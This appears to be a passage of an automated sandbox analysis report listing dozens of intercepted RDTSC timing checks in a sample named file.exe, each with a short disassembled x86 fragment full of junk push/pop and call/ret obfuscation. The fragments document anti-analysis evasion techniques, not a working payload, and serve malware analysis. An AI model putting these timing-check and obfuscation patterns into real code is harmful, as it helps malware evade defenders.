                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCC9A5 second address: FCC9C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C515287h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCC9C7 second address: FCCA2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F230C5197ABh 0x00000009 popad 0x0000000a pop eax 0x0000000b nop 0x0000000c and ebx, 333FAA36h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F230C5197A8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e mov bx, 392Dh 0x00000032 add dword ptr [ebp+1245DC02h], ecx 0x00000038 push 00000000h 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d js 00007F230C5197BEh 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCCA2A second address: FCCA3D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F230C515278h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCCA3D second address: FCCA43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCCA43 second address: FCCA49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCD988 second address: FCD98E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCD98E second address: FCDA25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C51527Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jno 00007F230C515284h 0x00000012 nop 0x00000013 jp 00007F230C515278h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007F230C515278h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 sub bx, D3A5h 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push eax 0x0000003f call 00007F230C515278h 0x00000044 pop eax 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 add dword ptr [esp+04h], 00000015h 0x00000051 inc eax 0x00000052 push eax 0x00000053 ret 0x00000054 pop eax 0x00000055 ret 0x00000056 xor dword ptr [ebp+122D1F3Ah], edi 0x0000005c xchg eax, esi 0x0000005d jmp 00007F230C515282h 0x00000062 push eax 0x00000063 push ebx 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCDA25 second address: FCDA29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCBD4C second address: FCBD50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCEA5E second address: FCEAB5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F230C5197A8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 mov edi, dword ptr [ebp+122D1F8Eh] 0x0000002b mov ebx, edx 0x0000002d push 00000000h 0x0000002f mov edi, dword ptr [ebp+122D28AAh] 0x00000035 push esi 0x00000036 or dword ptr [ebp+122DB307h], ebx 0x0000003c pop edi 0x0000003d push 00000000h 0x0000003f mov edi, dword ptr [ebp+122D1F3Ah] 0x00000045 xchg eax, esi 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F230C5197ABh 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCFB2E second address: FCFB41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C51527Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCFB41 second address: FCFB45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCCC28 second address: FCCC2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD1B43 second address: FD1B64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d jp 00007F230C5197A6h 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD1B64 second address: FD1B6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F230C515276h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD1B6F second address: FD1BCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push eax 0x00000009 mov edi, dword ptr [ebp+1246EDE3h] 0x0000000f pop edi 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F230C5197A8h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007F230C5197A8h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 xchg eax, esi 0x00000049 push esi 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD0DB5 second address: FD0DBE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD2BC0 second address: FD2BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD2BC4 second address: FD2BCA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD2BCA second address: FD2BD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD2BD0 second address: FD2BD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD3B2D second address: FD3B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F230C5197B8h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD2D81 second address: FD2DA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C515282h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a je 00007F230C515288h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD2DA2 second address: FD2DA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD2DA6 second address: FD2DAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD7CFB second address: FD7CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD7CFF second address: FD7D12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C51527Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD5E1A second address: FD5E75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov bx, C026h 0x0000000c movzx edi, si 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F230C5197A8h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 push ebx 0x00000031 mov ebx, dword ptr [ebp+122D3ACAh] 0x00000037 pop ebx 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f movzx edi, bx 0x00000042 mov eax, dword ptr [ebp+122D0499h] 0x00000048 mov ebx, dword ptr [ebp+122D3972h] 0x0000004e push FFFFFFFFh 0x00000050 cld 0x00000051 nop 0x00000052 push ecx 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 popad 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD8EE7 second address: FD8EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F230C515276h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD8EF2 second address: FD8EF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD8EF8 second address: FD8EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6D90 second address: FD6D94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD8EFC second address: FD8F00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD8F00 second address: FD8F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD8F0F second address: FD8F22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C51527Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD7ECB second address: FD7ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD7FBF second address: FD7FC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD7FC5 second address: FD7FC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD7FC9 second address: FD7FCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDE3A4 second address: FDE3AA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDE3AA second address: FDE3B7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE403D second address: FE4043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE4043 second address: FE4047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE4047 second address: FE404B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE404B second address: FE4056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE92CA second address: FE92EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F230C5197ACh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE94F8 second address: FE94FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE94FD second address: FE9518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F230C5197AFh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE9518 second address: FE9536 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C515281h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE9536 second address: FE953A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE953A second address: FE955E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F230C51527Dh 0x0000000c pop ecx 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F230C51527Ah 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE955E second address: FE9564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE9564 second address: FE9568 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE9642 second address: E21BCA instructions: 0x00000000 rdtsc 0x00000002 js 00007F230C5197B4h 0x00000008 jmp 00007F230C5197AEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jnc 00007F230C5197AAh 0x00000019 pop eax 0x0000001a jmp 00007F230C5197B7h 0x0000001f push dword ptr [ebp+122D04A9h] 0x00000025 jmp 00007F230C5197ABh 0x0000002a call dword ptr [ebp+122D2851h] 0x00000030 pushad 0x00000031 sub dword ptr [ebp+122D283Fh], ecx 0x00000037 cmc 0x00000038 xor eax, eax 0x0000003a mov dword ptr [ebp+122D283Fh], edi 0x00000040 mov edx, dword ptr [esp+28h] 0x00000044 jmp 00007F230C5197B7h 0x00000049 mov dword ptr [ebp+122D391Eh], eax 0x0000004f pushad 0x00000050 jnp 00007F230C5197A9h 0x00000056 movzx esi, si 0x00000059 mov al, bl 0x0000005b popad 0x0000005c mov esi, 0000003Ch 0x00000061 or dword ptr [ebp+122D283Fh], ebx 0x00000067 add esi, dword ptr [esp+24h] 0x0000006b stc 0x0000006c lodsw 0x0000006e pushad 0x0000006f mov ecx, dword ptr [ebp+122D396Ah] 0x00000075 pushad 0x00000076 clc 0x00000077 jmp 00007F230C5197AEh 0x0000007c popad 0x0000007d popad 0x0000007e add eax, dword ptr [esp+24h] 0x00000082 je 00007F230C5197ADh 0x00000088 ja 00007F230C5197A7h 0x0000008e mov ebx, dword ptr [esp+24h] 0x00000092 cld 0x00000093 nop 0x00000094 pushad 0x00000095 jne 00007F230C5197ACh 0x0000009b push eax 0x0000009c push edx 0x0000009d push eax 0x0000009e push edx 0x0000009f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F82B79 second address: F82B7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE38A second address: FEE38E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE4F5 second address: FEE4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE4F9 second address: FEE4FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE4FD second address: FEE512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F230C51527Dh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE8F4 second address: FEE908 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F230C5197A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F230C5197A6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEEE32 second address: FEEE36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEEE36 second address: FEEE51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F230C5197B1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEEE51 second address: FEEE55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF2F89 second address: FF2F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF2F8F second address: FF2F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF34FD second address: FF350F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F230C5197A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF3A76 second address: FF3A7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF3A7A second address: FF3A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF3A80 second address: FF3A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F230C51527Fh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFD228 second address: FFD22C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFD22C second address: FFD23D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jnp 00007F230C515276h 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFD23D second address: FFD245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFD245 second address: FFD249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFD249 second address: FFD24D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBF345 second address: FBF36C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C515289h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F230C515276h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBF36C second address: FBF370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBF370 second address: FA644C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F230C51528Ch 0x0000000c popad 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F230C515278h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 mov dx, ax 0x0000002b pushad 0x0000002c mov si, cx 0x0000002f mov dword ptr [ebp+122D26E4h], ecx 0x00000035 popad 0x00000036 lea eax, dword ptr [ebp+124710CFh] 0x0000003c push 00000000h 0x0000003e push esi 0x0000003f call 00007F230C515278h 0x00000044 pop esi 0x00000045 mov dword ptr [esp+04h], esi 0x00000049 add dword ptr [esp+04h], 00000016h 0x00000051 inc esi 0x00000052 push esi 0x00000053 ret 0x00000054 pop esi 0x00000055 ret 0x00000056 mov ecx, eax 0x00000058 push eax 0x00000059 jmp 00007F230C515282h 0x0000005e mov dword ptr [esp], eax 0x00000061 clc 0x00000062 call dword ptr [ebp+122D1EC4h] 0x00000068 push edx 0x00000069 jng 00007F230C51527Eh 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBF814 second address: FBF81A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBF81A second address: FBF844 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F230C51527Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F230C515282h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBFA21 second address: FBFA25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBFA25 second address: FBFA73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 771AA625h 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F230C515278h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D2895h], edi 0x0000002e cmc 0x0000002f push 9FBA7967h 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F230C51527Eh 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBFC14 second address: FBFC18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBFCA4 second address: FBFCAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
